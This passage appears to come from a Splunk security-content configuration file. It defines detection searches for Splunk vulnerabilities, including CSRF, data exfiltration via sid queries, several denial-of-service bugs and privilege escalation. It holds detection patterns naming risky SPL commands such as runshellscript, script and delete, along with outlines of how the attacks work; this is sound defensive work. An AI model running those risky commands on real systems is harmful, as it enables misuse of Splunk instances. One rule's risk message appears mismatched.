SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = False positives will be present until properly filtered by Username and search name. action.escu.creation_date = 2022-05-23 action.escu.modification_date = 2022-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Command and Scripting Interpreter Risky Commands - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Command and Scripting Interpreter Risky Commands - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "cve": ["CVE-2022-32154", "CVE-2024-29946"], "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search IN ("*| runshellscript *", "*| collect *","*| delete *", "*| fit *", "*| outputcsv *", "*| outputlookup *", "*| run *", "*| script *", "*| sendalert *", "*| sendemail *", "*| tscolle*") Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_command_and_scripting_interpreter_risky_commands_filter` [ESCU - Splunk Command and Scripting Interpreter Risky SPL MLTK - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection utilizes machine learning model named "risky_command_abuse" trained from "Splunk Command and Scripting Interpreter Risky SPL MLTK Baseline". It should be scheduled to run hourly to detect whether a user has run searches containing risky SPL from this list https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga with abnormally long running time in the past one hour, comparing with his/her past seven days history. This search uses the trained baseline to infer whether a search is an outlier (isOutlier ~= 1.0) or not (isOutlier~= 0.0) action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Splunk_Audit"] action.escu.eli5 = This detection utilizes machine learning model named "risky_command_abuse" trained from "Splunk Command and Scripting Interpreter Risky SPL MLTK Baseline". It should be scheduled to run hourly to detect whether a user has run searches containing risky SPL from this list https://docs.splunk.com/Documentation/Splunk/latest/Security/SPLsafeguards#Commands_that_trigger_the_warninga with abnormally long running time in the past one hour, comparing with his/her past seven days history. This search uses the trained baseline to infer whether a search is an outlier (isOutlier ~= 1.0) or not (isOutlier~= 0.0) action.escu.how_to_implement = This detection depends on MLTK app which can be found here - https://splunkbase.splunk.com/app/2890/ and the Splunk Audit datamodel which can be found here - https://splunkbase.splunk.com/app/1621/. Baseline model needs to be built using "Splunk Command and Scripting Interpreter Risky SPL MLTK Baseline" before this search can run. Please note that the current search only finds matches exactly one space between separator bar and risky commands. action.escu.known_false_positives = If the run time of a search exceeds the boundaries of outlier defined by the fitted density function model, false positives can occur, incorrectly labeling a long running search as potentially risky. action.escu.creation_date = 2022-05-27 action.escu.modification_date = 2022-05-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Command and Scripting Interpreter Risky SPL MLTK - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Abnormally long run time for risk SPL command seen by user $(Search_Activity.user). action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Command and Scripting Interpreter Risky SPL MLTK - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "cve": ["CVE-2022-32154"], "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats sum(Search_Activity.total_run_time) AS run_time, values(Search_Activity.search) as searches, count FROM datamodel=Splunk_Audit.Search_Activity WHERE (Search_Activity.user!="") AND (Search_Activity.total_run_time>1) AND (earliest=-1h@h latest=now) AND (Search_Activity.search IN ("*| runshellscript *", "*| collect *","*| delete *", "*| fit *", "*| outputcsv *", "*| outputlookup *", "*| run *", "*| script *", "*| sendalert *", "*| sendemail *", "*| tscolle*")) AND (Search_Activity.search_type=adhoc) AND (Search_Activity.user!=splunk-system-user) BY _time, Search_Activity.user span=1h | apply risky_command_abuse | fields _time, Search_Activity.user, searches, run_time, IsOutlier(run_time) | rename IsOutlier(run_time) as isOutlier, _time as timestamp | where isOutlier>0.5 | `splunk_command_and_scripting_interpreter_risky_spl_mltk_filter` [ESCU - Splunk csrf in the ssg kvstore client endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the kvstore_client endpoint allows for updating SSG KV store collections via a GET request. SSG is a Splunk Built app included by default with Splunk Enterprise. The vulnerability affects instances with SSG and Splunk Web enabled. This hunting search provides information on affected server specific method and post data that may reveal exploitation of this vulnerability. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the kvstore_client endpoint allows for updating SSG KV store collections via a GET request. SSG is a Splunk Built app included by default with Splunk Enterprise. The vulnerability affects instances with SSG and Splunk Web enabled. This hunting search provides information on affected server specific method and post data that may reveal exploitation of this vulnerability. action.escu.how_to_implement = Requires access to internal index. action.escu.known_false_positives = This hunting search only applies to the affected versions and setup mentioned in the description of this search, it does not extract payload so it requires manual investigation after executing search. This search will produce false positives. action.escu.creation_date = 2023-02-14 action.escu.modification_date = 2023-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk csrf in the ssg kvstore client endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Potential CSRF exploitation attempt from $splunk_server$ action.risk.param._risk = [{"risk_object_field": "splunk_server", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk csrf in the ssg kvstore client endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22942"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the kvstore_client endpoint allows for updating SSG KV store collections via a GET request. SSG is a Splunk Built app included by default with Splunk Enterprise. The vulnerability affects instances with SSG and Splunk Web enabled. This hunting search provides information on affected server specific method and post data that may reveal exploitation of this vulnerability. action.notable.param.rule_title = Splunk csrf in the ssg kvstore client endpoint action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` uri_path="/en-US/splunkd/__raw/services/ssg/kvstore_client" method="GET" delete_field_value="spacebridge_server" status="200" | table splunk_server status uri delete_field_value method post_data | `splunk_csrf_in_the_ssg_kvstore_client_endpoint_filter` [ESCU - Splunk Data exfiltration from Analytics Workspace using sid query - Rule] action.escu = 0 action.escu.enabled = 1 description = This hunting search allows operator to discover attempts to exfiltrate data by executing a prepositioned malicious search ID in Analytic Workspace in Splunk Enterprise versions 8.2.9,8.1.12,9.0.2. The attack is browser-based. It requires the attacker to compel a victim to initiate a request within their browser (phishing). The attacker cannot exploit the vulnerability at will. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This hunting search allows operator to discover attempts to exfiltrate data by executing a prepositioned malicious search ID in Analytic Workspace in Splunk Enterprise versions 8.2.9,8.1.12,9.0.2. The attack is browser-based. It requires the attacker to compel a victim to initiate a request within their browser (phishing). The attacker cannot exploit the vulnerability at will. action.escu.how_to_implement = The vulnerability affects only instances with Splunk Web Enabled. After running this search, please run "Splunk Command and Scripting Interpreter Risky SPL MLTK" to gain more insight into potentially risky commands which could lead to data exfiltration. action.escu.known_false_positives = This search may produce false positives. This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. Special attention must be paid to "/en-US/app/search/analytics_workspace?sid=[sid]" which is where the malicious code will be inserted to trigger attack at victim. action.escu.creation_date = 2022-11-1 action.escu.modification_date = 2022-11-1 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Data exfiltration from Analytics Workspace using sid query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Data exfiltration from Analytics Workspace using sid query - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43566"], "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `audit_searches` info=granted search NOT ("audit_searches") search NOT ("security_content_summariesonly") AND ((search="*mstats*[*]*" AND provenance="N/A") OR (search="*mstats*\\\"*[*]*\\\"*"))| eval warning=if(match(search,"\\\\\""), "POTENTIAL INJECTION STAGING", "POTENTIAL INJECTION EXECUTION") | table search, user, warning, timestamp | `splunk_data_exfiltration_from_analytics_workspace_using_sid_query_filter` [ESCU - Splunk Digital Certificates Infrastructure Version - Rule] action.escu = 0 action.escu.enabled = 1 description = This search will check the TLS validation is properly configured on the search head it is run from as well as its search peers after Splunk version 9. Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search will check the TLS validation is properly configured on the search head it is run from as well as its search peers after Splunk version 9. Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked. action.escu.how_to_implement = The user running this search is required to have a permission allowing them to dispatch REST requests to indexers (the `dispatch_rest_to_indexers` capability) in some architectures. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = No known at this time. action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Digital Certificates Infrastructure Version - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Digital Certificates Infrastructure Version - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2022-32153"], "impact": 50, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | rest /services/server/info | table splunk_server version server_roles | join splunk_server [| rest /servicesNS/nobody/search/configs/conf-server/ search="sslConfig"| table splunk_server sslVerifyServerCert sslVerifyServerName serverCert] | fillnull value="Not Set" | rename sslVerifyServerCert as "Server.conf:SslConfig:sslVerifyServerCert", sslVerifyServerName as "Server.conf:SslConfig:sslVerifyServerName", serverCert as "Server.conf:SslConfig:serverCert" | `splunk_digital_certificates_infrastructure_version_filter` [ESCU - Splunk Digital Certificates Lack of Encryption - Rule] action.escu = 0 action.escu.enabled = 1 description = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. In other circumstances, a client may be allowed to publish a forwarder bundle to other clients, which may allow for arbitrary code execution. The fixes for these require upgrading to at least Splunk 9.0 on the forwarder as well. This is a great opportunity to configure TLS across the environment. This search looks for forwarders that are not using TLS and adds risk to those entities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. In other circumstances, a client may be allowed to publish a forwarder bundle to other clients, which may allow for arbitrary code execution. The fixes for these require upgrading to at least Splunk 9.0 on the forwarder as well. This is a great opportunity to configure TLS across the environment. This search looks for forwarders that are not using TLS and adds risk to those entities. action.escu.how_to_implement = This anomaly search looks for forwarder connections that are not currently using TLS. It then presents the source IP, the type of forwarder, and the version of the forwarder. You can also remove the "ssl=false" argument from the initial stanza in order to get a full list of all your forwarders that are sending data, and the version of Splunk software they are running, for audit purposes. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = None at this time action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Digital Certificates Lack of Encryption - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = $hostname$ is not using TLS when forwarding data action.risk.param._risk = [{"risk_object_field": "hostname", "risk_object_type": "system", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Digital Certificates Lack of Encryption - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-32151"], "impact": 25, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` group="tcpin_connections" ssl="false" | stats values(sourceIp) latest(fwdType) latest(version) by hostname | `splunk_digital_certificates_lack_of_encryption_filter` [ESCU - Splunk DoS Using Malformed SAML Request - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions lower than 9.0.6, and 8.2.12, an attacker can send a malformed security assertion markup language SAML request to the /saml/acs REST endpoint which can cause a denial of service through a crash or hang of the Splunk daemon.The SAML extensible markup language (XML) parser does not fail SAML signature validation when the attacker modifies the URI in the SAML request. Instead it attempts to access the modified URI, which causes the Splunk daemon to crash or hang. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions lower than 9.0.6, and 8.2.12, an attacker can send a malformed security assertion markup language SAML request to the /saml/acs REST endpoint which can cause a denial of service through a crash or hang of the Splunk daemon.The SAML extensible markup language (XML) parser does not fail SAML signature validation when the attacker modifies the URI in the SAML request. Instead it attempts to access the modified URI, which causes the Splunk daemon to crash or hang. action.escu.how_to_implement = To run this search, you must have access to the _internal index. action.escu.known_false_positives = This search will show false positives. The analyst must look for errors and a pointer indicating a malicious file. action.escu.creation_date = 2023-09-05 action.escu.modification_date = 2023-09-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk DoS Using Malformed SAML Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk DoS Using Malformed SAML Request - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 30, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` event_message=*error* expr=*xpointer* | stats count min(_time) as firstTime max(_time) as lastTime by component expr splunk_server event_message | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `splunk_dos_using_malformed_saml_request_filter` [ESCU - Splunk DOS Via Dump SPL Command - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can exploit a vulnerability in the dump SPL command to cause a Denial of Service by crashing the Splunk daemon. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can exploit a vulnerability in the dump SPL command to cause a Denial of Service by crashing the Splunk daemon. action.escu.how_to_implement = This search does not require additional ingestion of data. Requires the ability to search _internal index and monitor segmentation faults. action.escu.known_false_positives = Segmentation faults may occur due to other causes, so this search may produce false positives action.escu.creation_date = 2023-05-10 action.escu.modification_date = 2023-05-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk DOS Via Dump SPL Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk DOS Via Dump SPL Command - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunk_crash_log` "*Segmentation fault*" | stats count by host _time | `splunk_dos_via_dump_spl_command_filter` [ESCU - Splunk DoS via Malformed S2S Request - Rule] action.escu = 0 action.escu.enabled = 1 description = On March 24th, 2022, Splunk published a security advisory for a possible Denial of Service stemming from the lack of validation in a specific key-value field in the Splunk-to-Splunk (S2S) protocol. This detection will alert on attempted exploitation in patched versions of Splunk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = On March 24th, 2022, Splunk published a security advisory for a possible Denial of Service stemming from the lack of validation in a specific key-value field in the Splunk-to-Splunk (S2S) protocol. This detection will alert on attempted exploitation in patched versions of Splunk. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This detection will only find attempted exploitation on versions of Splunk already patched for CVE-2021-3422. action.escu.known_false_positives = None. action.escu.creation_date = 2022-03-24 action.escu.modification_date = 2022-03-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk DoS via Malformed S2S Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = An attempt to exploit CVE-2021-3422 was detected from $src$ against $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 50}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk DoS via Malformed S2S Request - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-3422"], "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = On March 24th, 2022, Splunk published a security advisory for a possible Denial of Service stemming from the lack of validation in a specific key-value field in the Splunk-to-Splunk (S2S) protocol. This detection will alert on attempted exploitation in patched versions of Splunk. action.notable.param.rule_title = Splunk DoS via Malformed S2S Request action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` log_level="ERROR" component="TcpInputProc" thread_name="FwdDataReceiverThread" "Invalid _meta atom" | table host, src | `splunk_dos_via_malformed_s2s_request_filter` [ESCU - Splunk DOS via printf search function - Rule] action.escu = 0 action.escu.enabled = 1 description = This hunting search provides information on detecting a vulnerability In Splunk Enterprise versions lower than 8.1.14, 8.2.12, 9.0.6, and 9.1.1, an attacker can use the printf SPL function to perform a denial of service against the Splunk Enterprise instance. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This hunting search provides information on detecting a vulnerability In Splunk Enterprise versions lower than 8.1.14, 8.2.12, 9.0.6, and 9.1.1, an attacker can use the printf SPL function to perform a denial of service against the Splunk Enterprise instance. action.escu.how_to_implement = This search requires the ability to search internal indexes. action.escu.known_false_positives = This search may produces false positives, analyst most focuse in the use of printf conversion function of eval to craft an expression that splunkd cannot interpret correctly causing it to crash. action.escu.creation_date = 2023-08-30 action.escu.modification_date = 2023-08-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk DOS via printf search function - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk DOS via printf search function - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2023-40594"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `audit_searches` "*makeresults * eval * fieldformat *printf*" user!="splunk_system_user" search!="*audit_searches*" | stats count by user splunk_server host search | convert ctime(*time) |`splunk_dos_via_printf_search_function_filter` [ESCU - Splunk Edit User Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = A low-privilege user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = A low-privilege user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to discover abuse of edit_user privilege. action.escu.known_false_positives = This search may produce false positives as password changing actions may be part of normal behavior. Operator will need to investigate these actions in order to discern exploitation attempts. action.escu.creation_date = 2023-05-23 action.escu.modification_date = 2023-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Edit User Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Edit User Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2023-32707"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `audittrail` action IN ("change_own_password","password_change","edit_password") AND info="granted" AND NOT user IN (admin, splunk-system-user) | stats earliest(_time) as event_time values(index) as index values(sourcetype) as sourcetype values(action) as action values(info) as info by user | `splunk_edit_user_privilege_escalation_filter` [ESCU - Splunk Endpoint Denial of Service DoS Zip Bomb - Rule] action.escu = 0 action.escu.enabled = 1 description = This search allows operator to identify Splunk search app crashes resulting from specially crafted ZIP file using file monitoring that affects UF versions 8.1.11 and 8.2 versions below 8.2.7.1. It is not possible to detect Zip Bomb attack before crash. This search will provide Universal Forwarder errors from uploaded binary files (zip compression) which are used for this attack. If an analyst sees results from this search we suggest you investigate and triage what zip file was uploaded, zip compressed files may have different extensions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search allows operator to identify Splunk search app crashes resulting from specially crafted ZIP file using file monitoring that affects UF versions 8.1.11 and 8.2 versions below 8.2.7.1. It is not possible to detect Zip Bomb attack before crash. This search will provide Universal Forwarder errors from uploaded binary files (zip compression) which are used for this attack. If an analyst sees results from this search we suggest you investigate and triage what zip file was uploaded, zip compressed files may have different extensions. action.escu.how_to_implement = Need to monitor Splunkd data from Universal Forwarders. action.escu.known_false_positives = This search may reveal non malicious zip files causing errors as well. action.escu.creation_date = 2022-08-02 action.escu.modification_date = 2022-08-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Endpoint Denial of Service DoS Zip Bomb - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Potential exposure of environment variables from url embedded in dashboard action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 75}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Endpoint Denial of Service DoS Zip Bomb - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 75, "cve": 